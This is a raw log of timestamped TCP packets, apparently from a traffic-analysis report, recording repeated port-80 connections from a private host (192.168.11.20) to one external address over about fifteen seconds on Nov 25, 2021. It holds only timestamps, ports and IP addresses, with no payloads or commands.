                                              Nov 25, 2021 10:52:05.687913895 CET5030780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:05.721853018 CET8050307176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:05.722067118 CET5030780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:05.756237030 CET8050307176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:05.790992975 CET8050307176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:05.791043997 CET8050307176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:05.791223049 CET5030780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:05.791274071 CET5030780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:05.825438976 CET8050307176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:06.190764904 CET5030880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:06.224972010 CET8050308176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:06.225174904 CET5030880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:06.226742983 CET5030880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:06.260737896 CET8050308176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:06.260984898 CET5030880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:06.295001984 CET8050308176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:06.311167002 CET8050308176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:06.311216116 CET8050308176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:06.311393023 CET5030880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:06.311440945 CET5030880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:06.345669985 CET8050308176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:06.707827091 CET5030980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:06.741288900 CET8050309176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:06.741473913 CET5030980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:06.742991924 CET5030980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:06.776382923 CET8050309176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:06.776707888 CET5030980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:06.810072899 CET8050309176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:06.825978041 CET8050309176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:06.826026917 CET8050309176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:06.826248884 CET5030980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:06.826301098 CET5030980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:06.859663963 CET8050309176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:07.180216074 CET5031080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:07.214288950 CET8050310176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:07.214560986 CET5031080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:07.216253042 CET5031080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:07.250116110 CET8050310176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:07.250541925 CET5031080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:07.284281015 CET8050310176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:07.303674936 CET8050310176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:07.303689957 CET8050310176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:07.303925991 CET5031080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:07.303942919 CET5031080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:07.337773085 CET8050310176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:07.701594114 CET5031180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:07.735044956 CET8050311176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:07.735238075 CET5031180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:07.736749887 CET5031180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:07.770016909 CET8050311176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:07.770236015 CET5031180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:07.803488016 CET8050311176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:07.820126057 CET8050311176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:07.820173979 CET8050311176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:07.820606947 CET5031180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:07.820667982 CET5031180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:07.854224920 CET8050311176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:08.193758965 CET5031280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:08.227195978 CET8050312176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:08.227406979 CET5031280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:08.228883982 CET5031280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:08.262212038 CET8050312176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:08.262440920 CET5031280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:08.295958996 CET8050312176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:08.315520048 CET8050312176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:08.315582991 CET8050312176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:08.315789938 CET5031280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:08.315854073 CET5031280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:08.349529982 CET8050312176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:08.683666945 CET5031380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:08.717761993 CET8050313176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:08.718106985 CET5031380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:08.719767094 CET5031380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:08.754021883 CET8050313176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:08.754209042 CET5031380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:08.788182020 CET8050313176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:08.804300070 CET8050313176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:08.804356098 CET8050313176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:08.804635048 CET5031380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:08.804716110 CET5031380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:08.838689089 CET8050313176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:09.187535048 CET5031480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:09.221607924 CET8050314176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:09.221894026 CET5031480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:09.223408937 CET5031480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:09.257261992 CET8050314176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:09.257425070 CET5031480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:09.291352987 CET8050314176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:09.313186884 CET8050314176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:09.313199043 CET8050314176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:09.313357115 CET5031480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:09.313451052 CET5031480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:09.347323895 CET8050314176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:09.692442894 CET5031580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:09.726422071 CET8050315176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:09.726660013 CET5031580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:09.728245974 CET5031580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:09.762104988 CET8050315176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:09.762285948 CET5031580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:09.796154976 CET8050315176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:09.812256098 CET8050315176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:09.812330008 CET8050315176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:09.812459946 CET5031580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:09.812515974 CET5031580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:09.846561909 CET8050315176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:10.118916035 CET5031680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:10.152797937 CET8050316176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:10.152990103 CET5031680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:10.154548883 CET5031680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:10.188395023 CET8050316176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:10.188919067 CET5031680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:10.222744942 CET8050316176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:10.241029024 CET8050316176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:10.241058111 CET8050316176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:10.241316080 CET5031680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:10.241343021 CET5031680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:10.275340080 CET8050316176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:10.637928963 CET5031780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:10.671365023 CET8050317176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:10.671622038 CET5031780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:10.673270941 CET5031780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:10.706635952 CET8050317176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:10.706855059 CET5031780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:10.740159035 CET8050317176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:10.756206036 CET8050317176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:10.756256104 CET8050317176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:10.756453037 CET5031780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:10.756501913 CET5031780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:10.790071011 CET8050317176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:11.158129930 CET5031880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:11.192239046 CET8050318176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:11.192593098 CET5031880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:11.194119930 CET5031880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:11.228262901 CET8050318176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:11.228583097 CET5031880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:11.262562037 CET8050318176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:11.296035051 CET8050318176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:11.296084881 CET8050318176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:11.296278954 CET5031880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:11.296327114 CET5031880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:11.330431938 CET8050318176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:11.682853937 CET5031980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:11.716244936 CET8050319176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:11.716435909 CET5031980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:11.717968941 CET5031980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:11.751301050 CET8050319176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:11.751519918 CET5031980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:11.784948111 CET8050319176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:11.803318977 CET8050319176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:11.803385973 CET8050319176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:11.803586006 CET5031980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:11.803639889 CET5031980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:11.836998940 CET8050319176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:12.198776007 CET5032080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:12.232927084 CET8050320176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:12.233205080 CET5032080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:12.234683037 CET5032080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:12.268667936 CET8050320176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:12.268924952 CET5032080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:12.303060055 CET8050320176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:12.319963932 CET8050320176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:12.320019960 CET8050320176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:12.320301056 CET5032080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:12.354444981 CET8050320176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:12.659967899 CET5032180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:12.693090916 CET8050321176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:12.693286896 CET5032180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:12.694839001 CET5032180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:12.727998972 CET8050321176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:12.728185892 CET5032180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:12.761353016 CET8050321176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:12.788178921 CET8050321176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:12.788227081 CET8050321176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:12.788382053 CET5032180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:12.788429022 CET5032180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:12.821784973 CET8050321176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:13.146147013 CET5032280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:13.180337906 CET8050322176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:13.180640936 CET5032280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:13.182188034 CET5032280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:13.216131926 CET8050322176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:13.216311932 CET5032280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:13.250281096 CET8050322176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:13.267443895 CET8050322176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:13.267492056 CET8050322176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:13.267657042 CET5032280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:13.267705917 CET5032280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:13.301762104 CET8050322176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:13.642054081 CET5032380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:13.675474882 CET8050323176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:13.675731897 CET5032380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:13.677236080 CET5032380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:13.710619926 CET8050323176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:13.710833073 CET5032380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:13.744282961 CET8050323176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:13.760864019 CET8050323176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:13.760920048 CET8050323176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:13.761198044 CET5032380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:13.761281013 CET5032380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:13.794976950 CET8050323176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:14.154484034 CET5032480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:14.187946081 CET8050324176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:14.188196898 CET5032480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:14.189707041 CET5032480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:14.223037004 CET8050324176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:14.223253965 CET5032480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:14.256556034 CET8050324176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:14.273739100 CET8050324176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:14.273787975 CET8050324176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:14.273931980 CET5032480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:14.273978949 CET5032480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:14.307625055 CET8050324176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:14.678157091 CET5032580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:14.711510897 CET8050325176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:14.711848974 CET5032580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:14.713649988 CET5032580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:14.746906042 CET8050325176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:14.747116089 CET5032580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:14.780416965 CET8050325176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:14.800133944 CET8050325176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:14.800182104 CET8050325176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:14.800421953 CET5032580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:14.800471067 CET5032580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:14.833853960 CET8050325176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:15.199249983 CET5032680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:15.232693911 CET8050326176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:15.232924938 CET5032680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:15.234437943 CET5032680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:15.267832994 CET8050326176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:15.268006086 CET5032680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:15.301383972 CET8050326176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:15.320163965 CET8050326176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:15.320229053 CET8050326176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:15.320487022 CET5032680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:15.320539951 CET5032680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:15.353950024 CET8050326176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:15.671713114 CET5032780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:15.705557108 CET8050327176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:15.705764055 CET5032780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:15.707320929 CET5032780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:15.741161108 CET8050327176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:15.741425037 CET5032780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:15.775331020 CET8050327176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:15.799293995 CET8050327176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:15.799341917 CET8050327176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:15.799510002 CET5032780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:15.799560070 CET5032780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:15.833683968 CET8050327176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:16.168678999 CET5032880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:16.202826023 CET8050328176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:16.202971935 CET5032880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:16.204602957 CET5032880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:16.238581896 CET8050328176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:16.238796949 CET5032880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:16.272975922 CET8050328176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:16.295562983 CET8050328176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:16.295618057 CET8050328176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:16.295799017 CET5032880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:16.295883894 CET5032880192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:16.330075026 CET8050328176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:16.684437037 CET5032980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:16.717874050 CET8050329176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:16.718084097 CET5032980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:16.719602108 CET5032980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:16.753011942 CET8050329176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:16.753187895 CET5032980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:16.786787987 CET8050329176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:16.805646896 CET8050329176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:16.805716991 CET8050329176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:16.805872917 CET5032980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:16.805937052 CET5032980192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:16.839469910 CET8050329176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:17.191862106 CET5033080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:17.226062059 CET8050330176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:17.226299047 CET5033080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:17.227828979 CET5033080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:17.261914968 CET8050330176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:17.262125015 CET5033080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:17.296416044 CET8050330176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:17.314026117 CET8050330176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:17.314090967 CET8050330176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:17.314244032 CET5033080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:17.314306974 CET5033080192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:17.348582029 CET8050330176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:17.723432064 CET5033180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:17.756952047 CET8050331176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:17.757221937 CET5033180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:17.758847952 CET5033180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:17.792419910 CET8050331176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:17.792740107 CET5033180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:17.826308966 CET8050331176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:17.842144966 CET8050331176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:17.842195988 CET8050331176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:17.842382908 CET5033180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:17.842444897 CET5033180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:17.876032114 CET8050331176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:18.230158091 CET5033280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:18.263515949 CET8050332176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:18.263720989 CET5033280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:18.265321016 CET5033280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:18.298681974 CET8050332176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:18.298950911 CET5033280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:18.332283020 CET8050332176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:18.348356009 CET8050332176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:18.348431110 CET8050332176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:18.348629951 CET5033280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:18.348685980 CET5033280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:18.382019043 CET8050332176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:18.721518040 CET5033380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:18.755390882 CET8050333176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:18.755633116 CET5033380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:18.757230997 CET5033380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:18.791277885 CET8050333176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:18.791583061 CET5033380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:18.825520992 CET8050333176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:18.841252089 CET8050333176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:18.841315985 CET8050333176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:18.841619015 CET5033380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:18.841677904 CET5033380192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:18.875767946 CET8050333176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:19.224421978 CET5033480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:19.258419991 CET8050334176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:19.258608103 CET5033480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:19.260157108 CET5033480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:19.294126987 CET8050334176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:19.294414997 CET5033480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:19.328428984 CET8050334176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:19.345704079 CET8050334176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:19.345746040 CET8050334176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:19.345951080 CET5033480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:19.345982075 CET5033480192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:19.380161047 CET8050334176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:19.745745897 CET5033580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:19.779225111 CET8050335176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:19.779480934 CET5033580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:19.780977964 CET5033580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:19.814419031 CET8050335176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:19.814631939 CET5033580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:19.848000050 CET8050335176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:19.863940954 CET8050335176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:19.864013910 CET8050335176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:19.864175081 CET5033580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:19.864239931 CET5033580192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:19.897703886 CET8050335176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:20.249404907 CET5033680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:20.283571005 CET8050336176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:52:20.283772945 CET5033680192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:52:20.285330057 CET5033680192.168.11.20176.223.209.128
